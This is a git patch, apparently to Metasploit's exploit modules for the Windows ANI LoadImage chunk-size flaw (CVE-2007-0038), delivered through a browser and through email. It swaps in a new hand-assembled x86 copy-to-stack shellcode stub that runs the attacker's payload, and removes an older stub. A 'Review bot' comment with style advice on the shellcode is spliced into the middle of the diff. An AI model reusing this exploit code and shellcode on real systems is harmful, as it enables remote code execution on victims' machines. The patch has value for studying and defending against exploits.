From b2ff98b4e90c3050c0c1f9f31d0a85f618f27acd Mon Sep 17 00:00:00 2001
From: HD Moore
Date: Mon, 2 Apr 2007 05:42:27 +0000
Subject: [PATCH] Fixed the copy-to-stack stub, should work great now

git-svn-id: file:///home/svn/framework3/trunk@4610 4d416f70-5f16-0410-b530-b9f4589650da
---
 .../browser/ani_loadimage_chunksize.rb | 35 ++++++++++---------
 .../windows/email/ani_loadimage_chunksize.rb | 33 +++++++++--------
 2 files changed, 37 insertions(+), 31 deletions(-)

diff --git a/modules/exploits/windows/browser/ani_loadimage_chunksize.rb b/modules/exploits/windows/browser/ani_loadimage_chunksize.rb
index fc0a962d7b..be5ed83ed5 100644
--- a/modules/exploits/windows/browser/ani_loadimage_chunksize.rb
+++ b/modules/exploits/windows/browser/ani_loadimage_chunksize.rb
@@ -66,20 +66,7 @@ class Exploits::Windows::Browser::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote
 {
 'ConnectionType' => '-find',
 },
- 'PrependEncoder' =>
- # Our ANI file is randomly placed into a read-only segment, the only reliable
- # solution is to copy our payload back to the stack and execute it there. This
- # is non-optimal and should be replaced soon.
- "\xeb\x0f"+ # jmp _end
- "\x68\x70\x17\x00\x00"+ # push 6000
- "\x59"+ # pop ecx
- "\x5e"+ # pop esi
- "\x29\xcc"+ # sub esp, ecx
- "\x89\xe7"+ # mov edi, esp
- "\xf3\xa4"+ # rep movsb
- "\xff\xe4"+ # jmp esp
- "\xe8\xec\xff\xff\xff", # call _start
-
+
 'StackAdjustment' => -3500,
 },
 'Platform' => 'win',
@@ -308,9 +295,25 @@ class Exploits::Windows::Browser::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote
 # payload itself which comes after the riff chunk
 riff[trampoline_doffset + 1, 4] = [riff.length - trampoline_doffset - 4].pack('V')
 end
-
+
+ # Our ANI file is randomly placed into a read-only segment, the only reliable
+ # solution is to copy our payload back to the stack and execute it there. This
+ # is non-optimal and should be replaced soon.
+ copier =
+ "\xeb\x13"+ # jmp _end
+ "\x68\x00\x04\x00\x00"+ # push 1024
+ "\x59"+ # pop ecx
+ "\x5e"+ # pop esi
+ "\x29\xcc"+ # sub esp, ecx
+ "\x89\xe7"+ # mov edi, esp
+ "\xf3\xa4"+ # rep movsb
+ "\x89\xe3"+ # mov ebx, esp
+ "\x29\xcc"+ # sub esp, ecx
+ "\xff\xe3"+ # jmp ebx
+ "\xe8\xe8\xff\xff\xff" # call _start
+
 # Place the RIFF chunk in front and off we go
- ret = "RIFF" + [riff.length].pack('V') + riff + payload.encoded
+ ret = "RIFF" + [riff.length].pack('V') + riff + copier + payload.encoded
 end
 # Generates a riff chunk with the first bytes of the data being a relative
diff --git a/modules/exploits/windows/email/ani_loadimage_chunksize.rb b/modules/exploits/windows/email/ani_loadimage_chunksize.rb
index f6aabd321c..410b58b926 100644
--- a/modules/exploits/windows/email/ani_loadimage_chunksize.rb
+++ b/modules/exploits/windows/email/ani_loadimage_chunksize.rb
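Review bot: The `copier` byte string introduced at `@@ -308,9 +295,25 @@` is repeated verbatim in the email module's hunk at `@@ -293,8 +280,24 @@`, so the two stubs can silently drift apart the next time one of them is edited; hoisting it into a single frozen constant that both modules reference would keep them in step. The immediate in the `push 1024` line is a magic number that encodes the same value the email hunk sets as `'Space' => 1024`, yet nothing in the code or the comment ties the two together; the comment above `copier` should at least say `# the pushed immediate is the copy length and must equal the Payload 'Space' entry`. The wording "is non-optimal and should be replaced soon" would be easier to find later as `# TODO: replace this copy-to-stack stub`. The trailing `ret = ...` assignment is the method's implicit return value and the local is never read inside the hunk, so the expression alone (`"RIFF" + [riff.length].pack('V') + riff + copier + payload.encoded`) would do, though the enclosing method starts outside the hunk.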
@@ -57,25 +57,12 @@ class Exploits::Windows::Email::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote
 },
 'Payload' =>
 {
- 'Space' => 4000 + (rand(1000)),
+ 'Space' => 1024,
 'MinNops' => 32,
 'Compat' =>
 {
 'ConnectionType' => '-bind -find',
 },
- 'PrependEncoder' =>
- # Our ANI file is randomly placed into a read-only segment, the only reliable
- # solution is to copy our payload back to the stack and execute it there. This
- # is non-optimal and should be replaced soon.
- "\xeb\x0f"+ # jmp _end
- "\x68\x70\x17\x00\x00"+ # push 6000
- "\x59"+ # pop ecx
- "\x5e"+ # pop esi
- "\x29\xcc"+ # sub esp, ecx
- "\x89\xe7"+ # mov edi, esp
- "\xf3\xa4"+ # rep movsb
- "\xff\xe4"+ # jmp esp
- "\xe8\xec\xff\xff\xff", # call _start
 'StackAdjustment' => -3500,
 },
@@ -293,8 +280,24 @@ class Exploits::Windows::Email::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote
 riff[trampoline_doffset + 1, 4] = [riff.length - trampoline_doffset - 4].pack('V')
 end
+ # Our ANI file is randomly placed into a read-only segment, the only reliable
+ # solution is to copy our payload back to the stack and execute it there. This
+ # is non-optimal and should be replaced soon.
+ copier =
+ "\xeb\x13"+ # jmp _end
+ "\x68\x00\x04\x00\x00"+ # push 1024
+ "\x59"+ # pop ecx
+ "\x5e"+ # pop esi
+ "\x29\xcc"+ # sub esp, ecx
+ "\x89\xe7"+ # mov edi, esp
+ "\xf3\xa4"+ # rep movsb
+ "\x89\xe3"+ # mov ebx, esp
+ "\x29\xcc"+ # sub esp, ecx
+ "\xff\xe3"+ # jmp ebx
+ "\xe8\xe8\xff\xff\xff" # call _start
+
 # Place the RIFF chunk in front and off we go
- ret = "RIFF" + [riff.length].pack('V') + riff + payload.encoded
+ ret = "RIFF" + [riff.length].pack('V') + riff + copier + payload.encoded
 end
 # Generates a riff chunk with the first bytes of the data being a relative